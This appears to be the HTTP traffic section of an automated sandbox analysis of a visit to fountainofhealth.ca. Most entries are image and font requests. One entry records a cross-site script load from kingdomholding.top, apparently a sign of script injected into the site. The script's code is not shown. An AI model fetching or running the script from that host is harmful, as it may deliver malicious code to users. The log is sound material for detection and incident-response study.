Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /ss/index.js?5e7da6cb85fe8b1284 HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/0.5962628874685506:1748892536:s7uFNV44_UPqiWGt6NI_R-aJqAg0ni5tg1I2dsZR1CE/94996ae8ea2e4762 HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  referer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: image
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
  cookie: _ga=GA1.1.1027095347.1748893175
  priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1
  host: fountainofhealth.ca
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  accept: */*
  sec-fetch-site: none
  sec-fetch-mode: cors
  sec-fetch-dest: empty
  sec-fetch-storage-access: active
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
